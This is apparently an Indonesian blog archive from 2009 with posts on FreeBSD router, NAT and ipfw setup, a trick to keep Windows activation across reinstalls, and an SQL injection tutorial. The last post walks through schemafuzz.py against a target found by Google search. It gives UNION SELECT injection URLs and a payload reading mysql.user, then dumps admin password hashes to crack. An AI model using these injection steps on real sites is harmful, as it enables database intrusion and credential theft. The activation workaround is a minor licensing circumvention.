Selasa, 27 Januari 2009

Simpan Aktivasi Windows Anda


Sejak Windows XP, Windows harus diaktivasi supaya bisa dipakai. Kalau tidak diaktivasi, Windows cuma bisa dipakai selama 30 hari. Setelah itu, Windows dikunci dan hanya dapat digunakan kembali setelah diaktivasi.

Vendor peranti lunak lain mulai juga menerapkan teknik yang sama. Lihatlah antivirus dari Symantec atau aplikasi grafis dari Adobe. Sebelum bisa dipakai, peranti lunak harus diaktivasi dulu. Pilihan aktivasi yang umum diberikan adalah melalui Internet atau telepon.

Kenapa sih mau pakai peranti lunak harus melewati proses aktivasi? Tujuannya adalah menekan jumlah penyalahgunaan lisensi serta pembajakan. Dengan aktivasi, vendor peranti lunak dapat memastikan bahwa produk yang di-install pengguna bukan produk bajakan, tapi betul-betul pengguna yang sudah membeli lisensi dan lisensi itu digunakan dengan benar.

Anggaplah ada seorang pengguna komputer yang punya lisensi Windows untuk satu komputer. Pengguna tersebut menginstal di komputernya dan melakukan aktivasi. Ia punya komputer lain yang ia instali Windows yang sama. Windows di komputer kedua itu tidak bisa diaktivasi.

Aktivasi bisa dijadikan solusi menekan jumlah pembajakan produk bagi para pembuat peranti lunak. Tapi, cara ini bisa jadi sedikit masalah bagi pemilik lisensi resmi. Mengapa? Karena, jika pemilik komputer tidak memiliki koneksi internet, ia harus lebih repot melakukan aktivasi via telepon. Bayangkan, proses itu harus ia ulang ketika ia meng-install ulang Windows di komputernya.

Untuk masalah itu PCplus punya solusinya! Sebelum Anda melakukan install ulang Windows, ikuti dulu langkah-langkah ini.
1. Jalankan Windows Explorer.
2. Buatlah sebuah folder baru. Misalnya, folder bernama “backup” yang lokasinya ada di drive D.
3. Masuklah ke folder C:-WINDOWS-system32-. Jika Anda meng-install Windows di drive lain, Anda dapat menyesuaikan folder itu dengan drive yang Anda gunakan.
4. Pada bagian kanan jendela akan muncul sebuah informasi yang menyatakan bahwa file yang ada pada folder tersebut pada kondisi tersembunyi. Klik [Show the contents of this folder] untuk menampilkan isi dari folder system32.
5. Setelah folder system32 terbuka, carilah file bernama wpa.dbl.
6. Salin file wpa.dbl tersebut ke folder yang sebelumnya telah Anda buat (D:-backup).

Anda sudah boleh meng-install ulang Windows Anda. Setelah Windows sudah ter-install, lanjutkan pekerjaan dengan langkah-langkah ini.
1. Restart komputer dan tekan tombol [F8] pada keyboard sesaat sebelum komputer masuk ke sistem operasi Windows.
2. Pilih [Safe Mode].
3. Setelah masuk ke Windows, jalankan kembali Windows Explorer.
4. Masuklah ke folder D:-backup, tempat file backup wpa.dbl disimpan. Salin kembali file tersebut ke folder C:-WINDOWS-system32-.
5. Ketika file wpa.dbl Anda paste, akan muncul informasi bahwa file tersebut telah tersedia pada folder system32. Klik [Yes] saja.
6. Langkah terakhir, restart Windows. Windows tidak lagi meminta diaktivasi.

Ah, ada yang harus diperhatikan. Pastikan perangkat keras yang Anda gunakan tidak ada yang berubah sebelum dan sesudah Anda meng-install ulang Windows. Jika Anda menambah atau mengurangi perangkat keras komputer, trik ini tidak bisa digunakan.

Sumber: PCplus

Sabtu, 24 Januari 2009

Install Gateway Service FreeBSD

Chek kernel apakah sudah ada options-options berikut:

options IPDIVER # Untuk Gateway
options IPFIREWALL # Untuk Keamanan
options IPFIREWALL_VERBOSE # Untuk melihat proses keamanan
options DUMMYNET # Untuk membatasi bandwidth

#vi /sys/i386/conf/GENERIC

Perintah diatas untuk melihat file konfigurasi kernel (kernel yang digunakan GENERIC)
Jika options² diatas belum ada, maka kernel harus dikompile ulang dengan menambahkan options² tersebut.
Klik disini untuk langkah² kompile kernel.

Edit File rc.conf

#vi /etc/defaults/rc.conf

Ubahlah variable² berikut, dan sesuaikan dengan network card yang terinstall.

hostname=”xxx.xxx.xxx”
natd_interface=”xl0″ [Ethernet card IP Register]
ifconfig_xl1=”inetxxx.xxx.xxx.xxx netmask xxx.xxx.xxx.xxx” [IP Privat--> untuk gateway]
inet_flags=”-wW -l -R 1024″
firewall_enable=”YES”
firewall_type=”OPEN”
natd_enable=”YES”
netd_flags=”-u”

:wq [keluar dan disimpan]

Reboot komputer dengan perintah berikut

# shutdown-r

atau

# reboot

Performance natd di freebsd

Sewaktu saya mensetting natd dengan ipfw/divert di FreeBSD, pada saat traffik padat dan jumlah pc LAN semakin besar kerja Processor juga menjadi semakin berat. menhakibatkan performance router jadi turun juga.

solusi yang bisa di pakai adalah dengan menggunakan ipnat. Perbedaan antara natd dengan ipnat adalah :

* Natd adalah userland process, sehingga akan banyak memakai resources system sewaktu harus komunikasi dengan kernel
* sedangkan ipnat di load di kernel, dan berjalan lebih cepat. [man inat]

Konfigurasi IPNAT

Pertama kita perlu setting mesin Freebsd agar menjalankan ipnat dan berfungsi sebagai gateway.
Tambahkan baris berikut di file /etc/rc.conf :

gateway_enable="YES"
ipfilter_enable="YES"
ipnat_enable="YES"
ipnat_rules="/etc/ipnat.rules"

Kemudian kita perlu membuat file ipnat.rules . di bawah saya sertakan contohnya:

### ---------------------------------------------------------------------
# Sample /etc/ipnat.rules by tunggul
# Jul 24 19:10:12 PST 2008
#
# Load this like:
# ipnat -C -f /etc/ipnat.conf
# /etc/rc.d/ipnat start (will delete active sessions...)
#
### ---------------------------------------------------------------------

### ---------------------------------------------------------------------
### Contoh untuk meredirect port webserver
### Ubah 'fxp0' sesuai dengan ethernet anda.
### ---------------------------------------------------------------------

rdr fxp0 69.22.154.11/32 port 80 -> 10.1.1.2 port 80 tcp
rdr fxp0 69.22.154.12/32 port 80 -> 10.1.1.3 port 80 tcp
rdr fxp0 69.22.154.13/32 port 80 -> 10.1.1.5 port 80 tcp

rdr fxp0 69.22.154.11/32 port 443 -> 10.1.1.2 port 443 tcp
rdr fxp0 69.22.154.12/32 port 443 -> 10.1.1.3 port 443 tcp
rdr fxp0 69.22.154.13/32 port 443 -> 10.1.1.5 port 443 tcp

rdr fxp0 69.22.154.11/32 port 22 -> 10.1.1.2 port 22 tcp

### ---------------------------------------------------------------------
### Example Outgoing Mapping
### All out going requests from the internal 10.1.1.0/24 network
### will appear to be coming from 69.22.154.14
### ---------------------------------------------------------------------

map fxp0 10.1.1.0/24 -> 69.22.154.14/32

### ---------------------------------------------------------------------
### Example Round Robin load balancer
### ---------------------------------------------------------------------

# www.monkeybrains.net 69.22.154.65
rdr fxp0 69.22.154.65/32 port 80 -> 10.1.101.65 port 80 tcp round-robin
rdr fxp0 69.22.154.65/32 port 80 -> 10.1.102.65 port 80 tcp round-robin
rdr fxp0 69.22.154.65/32 port 80 -> 10.1.103.65 port 80 tcp round-robin

Konigurasi jumlah Maksimal Active Sessions

Sewaktu pertama kali setting ipnat, router jadi tidak bisa respon karena maksimal koneksi untuk client cuman 30.000 mappings. Untuk melihat jumlah mapping saat ini dengan perintah : ipnat -s .

# ipnat -s
mapped in 105990558 out 100799549
added 13276971 expired 0
no memory 0 bad nat 731
inuse 24837
rules 34
wilds 0

Pertanyaan selanjutnya berapa kita harus setting koneksi untuk ipnat ? untuk mengecek gunakan perintah berikut :

# ipf -T list | grep nattable
ipf_nattable_sz min 0x1 max 0x7fffffff current 2047
ipf_nattable_max min 0x1 max 0x7fffffff current 30000

Untuk mensetting bisa dilakaukan dengan dua cara :

* Cara yang susah dengan recompile ipfilter:
/usr/src/sys/modules/ipfilter && make clean
make -DLARGE_NAT depend && make -DLARGE_NAT && make install
* Cara yang mudah dengan menambah variabel di ipfilter.
Set /etc/rc.conf:

ipfilter_enable="YES"
ipfilter_rules="/etc/ipf.rules"
ipfilter_flags="-D -T ipf_nattable_sz=10009,ipf_nattable_max=300000 -E"
ipnat_enable="YES"
ipnat_rules="/etc/ipnat.rules"

Setelah mengubah file /etc/rc.conf, restart ipfilter

Sekarang anda bisa menghandle sampai 300,000 NAT Mappings. gunakan ipnat -l untuk melihat session yang aktif.
Setting agar waktu Timeouts kecil

Setting ini berfungsi memperkecil TCP session timeout untuk NAT sessions. Sehingga bisa meningkatkan jumlah Maximum Active Sessions yang bisa di handle per time. Ubah setting ipfilter_flags di file /etc/rc.conf:
ipfilter_flags=”-D -T ipf_nattable_sz=10009,ipf_nattable_max=300000,\ fr_tcptimeout=180,fr_tcpclosewait=60,fr_tcphalfclosed=7200,fr_tcpidletimeout=172800 -E”

sumber:http://tunggul.staff.uns.ac.id

ROUTER Freebsd dengan nat

kemarin aku baru cobak distro baru unix freebsd.. kok malah aku kecantol ma freebsd
cinta pada pandangan pertama nih… aku mulai dari download tutorial dari embah google
nyuri sana sini.. akhirnya aku buat dhe coretan ini.. okehh….
sejauh ini udah aku buktikan udah bisa.. alhamdulillah.. langsung aja dhe.. kalo
mau makan, makan aja dulu, mau kebelakang cpt kebelakang……z z z zz
kalo udah siap.. lemas kan jari2 anda.. siapkan segala nya
mulai dari mental n spirit anda …
karena kita udah mulai semangat mengikuti projek ini..
ambil nafas dalam-dalam… keluarkan .. lakukan sesuai selera anda..
are you ready…. 1 …. 2

1. install dulu OS freebsd nya
2. install dengan packet yang minimum aja biar g lama..
3. setelah itu kita mulai compile kernel, tapi sebelunya periksa dulu
/usr/rc/sys/ kalo belum ada berarti belum ada.. perlu di install dulu thu packetnya
4. install kernel yuukk… mounting terlebih dahulu cdrom nya.. mount /cdrom/ kalo udah
ketik aja “sysinstall” pilih paket agar bisa download dari luar kita instal port
nya juga “port” dicentang lagi
5. sesudah itu kita mulai compile kernel pertama kita cp dulu file GENERIC yang ada di
directory /usr/src/sys/i386/conf/ sebagai contoh saya cp dengan nama ROUTER
6. kalo udah kita copy kita edit file ROUTER yang kita copy tadi “ee ROUTER”
7. ganti indent GENERIc dengan indent ROUTER tambah kan opiton berikut:

options IPFIREWALL
options IPFIREWALL_FORWARD
options IPFIREWALL_VERBOSE
options IPFIREWALL_VERBOSE_LIMIT=10
options IPFIREWALL_DEFAULT_TO_ACCEPT
options IPDIVERT
options IPSTEALTH
options DUMMYNET
options HZ=1000
options IPFILTER
options IPFILTER_LOG

#speedy
options NETGRAPH
options NETGRAPH_ETHER
options NETGRAPH_PPPOE
options NETGRAPH_SOCKET
#management bw
options ALTQ # Alternate queueing
options ALTQ_CBQ # Class Based Queueing
options ALTQ_RED # Random Early Detection
options ALTQ_RIO # Triple RED for DiffServ (needs RED)
options ALTQ_HFSC # Hierarchical Fair Service Curve
options ALTQ_CDNR # DiffServ traffic conditioner
options ALTQ_PRIQ # Priority Queue

#packet filter
device pf
device pflog
device pfsync

#squid
options SYSVMSG
options MSGMNB=8192
options MSGMNI=40
options MSGSEG=512
options MSGSSZ=64
options MSGTQL=2048

options SYSVSHM
options SHMSEG=16
options SHMMNI=32
options SHMMAX=2097152
options SHMALL=4096

agar lebih enak kita hilangin aja option yang g berguna seperti SCI,RAID, dll
sesuaikan dengan kompi anda pokok e..

8. kalo udah ketikkan “#configur ROUTER” sesudah itu “#make cleandepend && make depend”
tunggu sambil ngopi g boleh ngerokok he he… kalo udah “#make && make install”
wah nunggu lagi nih kita makan aja dulu.. kan dah laper
bung kalo udah kita ngapain lagi
kita reboot kompi kita.. kalo udah login lalu kita ketik uname -i kalo udah muncul
“ROUTER” berbahagialah hasil compile anda ..::berhasil”…
9. Konfigurasi IP Address:
sebelum anda lakukan setting ini, tanyakan milik anda, mulai dari IP Public, subnet, gateway lengkap
dengan DNS nya kepada ISP anda. kemudian lanjutkan dgn perintah ini:
# ee /etc/rc.conf
hostname=”iwan.com” ==> ada g thu
ifconfig_rl0=”inet 199.199.199.7 netmask 255.255.255.0? ==> ke internet
ifconfig_rl1=”inet 192.168.0.1 netmask 255.255.255.0? ==> ke LAN
defaultrouter=”199.199.199.1?
kemudian simpan, lanjutkan ke setting DNS.
Setting DNS:
10. # ee /etc/resolve.conf
Domain jardiknas.org
nameserver 118.98.224.2 ==> dns1 anda
nameserver 118.98.224.3 ==> dns2 kamu

pastikan router kita bisa akses internet.. ping aja ke google.com “#ping google.com”
kalo dah replay wah lanjut dhe..
11.Setting Firewall, Natd, dan service-service lainnya:
# ee /etc/defaults/rc.conf
selanjutnya akan muncul spt dibawah ini:
defaultrouter =”YES”
gateway_enable = “YES”
sshd_enable =”YES” # agar bisa remote dgn putty
firewall_enable =”YES” # sebagai filter
firewall_type =”OPEN”
natd_enable =”YES”
natd_interface =”rl0? # lan card yg disambung ke IP Public / internet.
sendmail semuanya yang “YES” diganti “NO” untuk men-disable service sendmail.
simpan konfigurasi ini, kemudian reboot komputer:
12.# reboot
sejauh ini fungsi router standart sudah selesai, g percaya?? coba aja di client..
akan tetapi jika anda ingin menambah konfigurasi
lanjutkan saja tahab berikut:

Mengaktifkan ftp, ssh,telnet, dll:
# ee /etc/inetd.conf
ftp tcp nowait # hapus tanda pagar di depan teks ftp
ssh tcp nowait # hapus tanda pagar di depan teks ssh
telnet tcp nowait # hapus tanda pagar di depan teks telnet

Mengganti Port ssh:
# ee /etc/ssh/sshd_config
~
#VersionAddendum FreeBSD-20050903 ~
Port 22 # hilangkan tanda pagar didepan teks port dan angka 22 boleh anda ganti
ke 2222/7575 sesuai dengan selera anda.

Mempercepat delay booting freebsd:
# ee /boot/defaults/loader.conf
~
#autoboot_delay=”10? # hilangkan tanda pagarnya dan ganti angka 10 sesuai dengan
keinginan anda (misal: 1)

Me remote router dari komputer workstation.
Login dari konsole pakai ssh di linux dan unix:
# ssh 199.199.199.1
Login dari ms. windows pake putty.exe <— program telnet dan ssh untuk remote melalui windows ke unix dan linux.

Mengupdate FreeBSD ke KERNEL STABLE secara online menggunakan CVSup
# pkg_add -r cvsup-without-gui
# cp /usr/share/examples/cvsup/stable-supfile /etc
# ee /etc/stable-supfile
–> cvsup.id.freebsd.org # update kernel dari server indonesia.
# reboot
lanjutkan dgn perintah ini:
# cvsup -g -L 2 /etc/stable-supfile
# ee /etc/make.conf
KERNCONF=ROUTER
# cd /usr/src/
# make buildworld
# make buildkernel
# make installkernel
# reboot

===========================
ngedit tampilan awal router
===========================

ee /etc/motd

FreeBSD 5.3-RELEASE (MPL) #0: Mon Jan 14 23:44:30 UTC 2008

Welcome to my Router

+++++++++++++++++++++++++++++++++++++++++++
+++++++++++++++++++++++++++++++++++++++++++
+++ +++
+++ ATTENTION! +++
+++ You’re now on strict area of +++
+++ Proxy Minas Pagai Network, +++
+++ all your activity are being logged. +++
+++ +++
+++++++++++++++++++++++++++++++++++++++++++
+++++++++++++++++++++++++++++++++++++++++++
Regard’s -admin underiez dot com

Mudah2an bermanfaat
-=selesai=-
sumber:http://underiez.com/2008/10/23/router-freebsd-dengan-nat/

Konfigurasi Firewall di FreeBSD menggunakan ipfw

1. Konfigurasi Kernel
Ada beberapa opsi konfigurasi yang harus ditambahkan pada kernel agar ipfw dapat digunakan, Opsi yang akan di tambahkan pada file kernel antara lain :

options IPFIREWALL #firewall
options IPFIREWALL_VERBOSE #informasi firewallnya
options IPFILTER #dukungan untuk ipfilter
options IPFILTER_LOG #log ipfilter

#options IPFIREWALL_DEFAULT_TO_ACCEPT

Jika anda menginginkan default firewall menjadi terbuka, tambahkan saja opsi tersebut.

2. Kompilasi kernel

# cd /usr/src/sys/i386/conf; config CONFIG_KERNEL_
# cd ../../compile/CONFIG_KERNEL
# make depend; make

3. Instalasi Kernel

Jika proses diatas selesai tanpa ‘error’ maka perintah terakhir

#make install
#init 6

4. Menggunakan ipfw untuk membuat ACL (access control list)
Secara dasar aturan untuk ipfw sebagai berikut :

ipfw action number [allow|deny] [all|tcp|udp|ip] darimana kemana via apa

Ubah user menjadi root, contoh nya :

#su

Membolehkan localhost untuk berkomunikasi dengan dirinya sendiri :

/sbin/ipfw add 100 pass all from any to any via lo0
/sbin/ipfw add 200 deny all from any to 127.0.0.0/8

Membolehkan localhost untuk berkomunikasi ke siapa saja melalui ethernet

/sbin/ipfw add 300 allow all from IP_ANDA to any

Membolehkan koneksi normal yang sudah terhubung dengan baik

/sbin/ipfw add 350 allow tcp from any to any established

Jika anda menjalankan webserver dan mailserver, anda memerlukan port 80 dan 25 agar dapat

di akses oleh host yang lain.

/sbin/ipfw add 400 allow tcp from any to any 80
/sbin/ipfw add 500 allow tcp from any to any 25

Membolehkan data tipe udp untuk dikirimkan dari nameserver sebagai fungsi DNS :

/sbin/ipfw add 600 allow udp from DNS_SERVER 53 to IP_ANDA

Membolehkan seluruh ICMP kecuali ping :

/sbin/ipfw add 700 deny icmp from any to YOUR_IP_HERE icmptypes 8
/sbin/ipfw add 800 allow icmp from any to any

Jika anda ingin host berjalan dengan tipe firewall terbuka, tambahkan di file /etc/rc.conf

firewall_enable=”YES”
firewall_type=”OPEN”

Semoga Bermanfaat.
sumber: www.purwakarta.org

Senin, 19 Januari 2009

Tutorial SQL Injection dengan Menggunakan Schemafuzz

Author : Andr3^81
e-Mail : andr3-81 [at] linuxmail [dot] org
website : http://andr381.tk

Schemafuzz.py dibuat dengan menggunakan bahasa python oleh rsauron[@]gmail[dot]com dari situs darkc0de
tujuannya untuk memudahkan para SQL injector menemukan tabel dan kolom pada database sql yang dipenetrasi.
ok untuk tidak berpanjang lebar lagi mari kita perhatikan dengan seksama langkah-langkah berikut
pertama-tama kita cari target dengan google dan ditemukan:
misalnya

http://127.0.0.1/site/phpweb/forum.php?forum=1


sebelum kita melangkah lebih lanjut perlu kita ketahui apa saja perintah yang harus digunakan.
caranya seperti ini ./schemafuzz.py -h help
kita temukan sebagian perintahnya seperti ini
--schema, --dbs, --dump, --fuzz, --info, --full, --findcol

langkah pertama
----------------
./schemafuzz.py -u "http://127.0.0.1/site/phpweb/forum.php?forum=1" --findcol
diperoleh seperti ini
[+] URL:http://127.0.0.1/site/phpweb/forum.php?forum=1--
[+] Evasion Used: "+" "--"
[+] 01:32:04
[+] Proxy Not Given
[+] Attempting To find the number of columns...
[+] Testing: 0,1,2,3,4,5,
[+] Column Length is: 6
[+] Found null column at column #: 1
[+] SQLi URL: http://127.0.0.1/site/phpweb/forum.php?forum=1+AND+1=2+UNION+SELECT+0,1,2,3,4,5--
[+] darkc0de URL: http://127.0.0.1/site/phpweb/forum.php?forum=1+AND+1=2+UNION+SELECT+0,darkc0de,2,3,4,5
[-] Done!
langkah kedua
--------------
setelah ketemu kita masukkan copy yang darkc0de URL jadi seperti ini
./schemafuzz.py -u "http://127.0.0.1/site/phpweb/forum.php?forum=1+AND+1=2+UNION+SELECT+0,darkc0de,2,3,4,5" --fuzz
diperoleh seperti ini
[+] URL:http://127.0.0.1/site/phpweb/forum.php?forum=1+AND+1=2+UNION+SELECT+0,darkc0de,2,3,4,5--
[+] Evasion Used: "+" "--"
[+] 01:37:09
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: webthings
User: testing@localhost
Version: 5.0.51a
[+] Number of tables names to be fuzzed: 354
[+] Number of column names to be fuzzed: 263
[+] Searching for tables and columns...
[+] Found a table called: mysql.user
[+] Now searching for columns inside table "mysql.user"
[!] Found a column called:user
[!] Found a column called:password
[-] Done searching inside table "mysql.user" for columns!
[-] [01:37:48]
[-] Total URL Requests 618
[-] Done
langkah ketiga
---------------
Setelah kita temukan nama databasenya trus kita lanjutkan kelangkah berikutnya
./schemafuzz.py -u "http://127.0.0.1/site/phpweb/forum.php?forum=1+AND+1=2+UNION+SELECT+0,darkc0de,2,3,4,5" --schema -D namadatabasenya
./schemafuzz.py -u "http://127.0.0.1/site/phpweb/forum.php?forum=1+AND+1=2+UNION+SELECT+0,darkc0de,2,3,4,5" --schema -D webthings
[+] URL:http://127.0.0.1/site/phpweb/forum.php?forum=1+AND+1=2+UNION+SELECT+0,darkc0de,2,3,4,5--
[+] Evasion Used: "+" "--"
[+] 01:43:11
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: webthings
User: testing@localhost
Version: 5.0.51a
[+] Showing Tables & Columns from database "webthings"
[+] Number of Tables: 33
[Database]: webthings
[Table: Columns]
[0]wt_articles: cod,article_id,subtitle,page,text,text_ori,htmlarticle,views
[1]wt_articles_title: article_id,category,title,active,date,userid,views
[2]wt_articlescat: cod,category
[3]wt_banners: cod,name,active,image,url_image,url,code,views,clicks,periode,start_date,end_date
[4]wt_banners_log: banner,date,views,clicks,sessions
[5]wt_banners_rawlog: banner,type,date,session
[6]wt_centerboxes: cod,pos,active,oneverypage,menuoption,title,content,file,type,draw_box
[7]wt_comments: cod,type,link,date,userid,comment
[8]wt_config: id,config
[9]wt_downloads: id,category,name,active,url,date,size,count,rate_sum,rate_count,short_description,description,small_picture,big_picture,author_name,author_email,comments,url_screenshot,license,license_text
[10]wt_downloadscat: cod,ref,name,descr
[11]wt_faq: cod,topic,uid,active,question_ori,question,answer_ori,answer
[12]wt_faq_topics: cod,name
[13]wt_forum_log_topics: uid,msgid,logtime,notifysent
[14]wt_forum_msgs: cod,forum,msg_ref,date,userid,title,text_ori,date_der,views,closed,sticky,modifiedtime,modifiedname,notifies
[15]wt_forums: cod,title,descr,locked,notifies,register
[16]wt_forums_mod: forum,userid,type
[17]wt_guestbook: id,datum,naam,email,homepage,plaats,tekst
[18]wt_links: id,category,active,name,url,count,descr,obs
[19]wt_linkscat: cod,name,descr,parent_id
[20]wt_menu: id,pos,title,url,type,newwindow,lang
[21]wt_news: cod,lang,category,catimgpos,date,title,userid,image,align,active,counter,text,text_ori,full_text,full_text_ori,archived,sidebox,sideboxtitle,sideboxpos
[22]wt_newscat: cod,name,image
[23]wt_online: id,time,uid
[24]wt_picofday: id,category,userid,small_picture,big_picture,description,full_description,views,clicks
[25]wt_picofdaycat: id,name,description
[26]wt_picofdaysel: date,picture_id,views,clicks
[27]wt_polls: cod,dtstart,dtend,question,item01,item02,item03,item04,item05,item06,item07,item08,item09,item10,count01,count02,count03,count04,count05,count06,count07,count08,count09,count10
[28]wt_sideboxes: cod,pos,side,active,title,content,file,type,function,modules
[29]wt_user_access: userid,module
[30]wt_user_book: userid,cod_user
[31]wt_user_msgs: cod,userid,folder,date,user_from,title,msg_read,text,notify
[32]wt_users: uid,name,password,class,realname,email,question1,question2,url,receivenews,receiverel,country,city,state,icq,aim,sex,session,active,comments,
newsposted,commentsposted,faqposted,topicsposted,dateregistered,dateactivated,lastvisit,logins,newemail,newemailsess,avatar,lang,theme,signature,banned,msn,showemail
[-] [01:43:48]
[-] Total URL Requests 270
[-] Done
untuk mengetahui apakah kita bisa load_file dalam site tersebut gunakan perintah ini
./schemafuzz.py -u "http://127.0.0.1/site/phpweb/forum.php?forum=1+AND+1=2+UNION+SELECT+0,darkc0de,2,3,4,5" --info
maka akan tampil seperti ini
[+] URL:http://127.0.0.1/site/phpweb/forum.php?forum=1+AND+1=2+UNION+SELECT+0,darkc0de,2,3,4,5--
[+] Evasion Used: "+" "--"
[+] 01:46:51
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: webthings
User: testing@localhost
Version: 5.0.51a
[+] Do we have Access to MySQL Database: Yes <-- w00t w00t
[!] http://127.0.0.1/site/phpweb/forum.php?forum=1+AND+1=2+UNION+SELECT+0,concat(user,0x3a,password),2,3,4,5+FROM+mysql.user--
[+] Do we have Access to Load_File: No
[-] [01:46:51]
[-] Total URL Requests 3
[-] Done
ternyata kita gak bisa load_file tapi bisa mengakses ke database mysqlnya hehehe
untuk mengetahui beberapa database yang terdapat pada site tersebut, kita gunakan perintah seperti ini
./schemafuzz.py -u "http://127.0.0.1/site/phpweb/forum.php?forum=1+AND+1=2+UNION+SELECT+0,darkc0de,2,3,4,5" --dbs
akan tampil seperti ini
[+] URL:http://127.0.0.1/site/phpweb/forum.php?forum=1+AND+1=2+UNION+SELECT+0,darkc0de,2,3,4,5--
[+] Evasion Used: "+" "--"
[+] 01:58:15
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: webthings
User: testing@localhost
Version: 5.0.51a
[+] Showing all databases current user has access too!
[+] Number of Databases: 1
[0]webthings
[-] [01:58:17]
[-] Total URL Requests 30
[-] Done
langkah selanjutnya
--------------------
cara untuk menemukan user dan password
kita gunakan perintah --dump -D namadatabase -T namatabel -C namakolom
setelah kita menemukan nama database, nama tabel dan kolom tinggal kita masukkan perintah seperti ini
./schemafuzz.py -u "http://127.0.0.1/site/phpweb/forum.php?forum=1+AND+1=2+UNION+SELECT+0,darkc0de,2,3,4,5" --dump -D webthing -T wt_users -C name,password
eing ing eng....
jreennnng....keluar deh user ama passwordnya
hasilnya dibawah ini
[+] URL:http://127.0.0.1/site/phpweb/forum.php?forum=1+AND+1=2+UNION+SELECT+0,darkc0de,2,3,4,5--
[+] Evasion Used: "+" "--"
[+] 02:08:47
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: webthings
User: testing@localhost
Version: 5.0.51a
[+] Dumping data from database "webthings" Table "wt_users"
[+] Column(s) ['name', 'password']
[+] Number of Rows: 2
[0] admin:e00b29d5b34c3f78df09d45921c9ec47:
[1] user:098f6bcd4621d373cade4e832627b4f6:
[-] [02:08:48]
[-] Total URL Requests 4
[-] Done
jangan lupa kita selalu mengecek schemafuzzlog.txt nya
setelah itu tinggal kita meng crack passwordnya pake program
gemana rekan2 gampang kan pake schemafuzz
NB:
Langkah diatas sangat mudah digunakan pada MySQL v5 kalau untuk MySQL versi 4 silakan menebak2 tabel ama kolomnya
Ingat kita jgn terlalu dimanjakan dengan program yang siap pakai, sebab kita gak ngerti dasar-dasarnya, asal-usulnya...
program tersebut hanya bertujuan untuk membantu kita apabila kita tidak menemukan sesuatu yang muncul dalam site target.

PERHATIAN!!!! jangan merusak, jadikan tutorial ini sebagai pembelajaran bagi para admin maupun yang pengen belajar sql injection serta newbie seperti saya
Tulisan ini silahkan di copas dengan menyertakan kredit pengarangnya.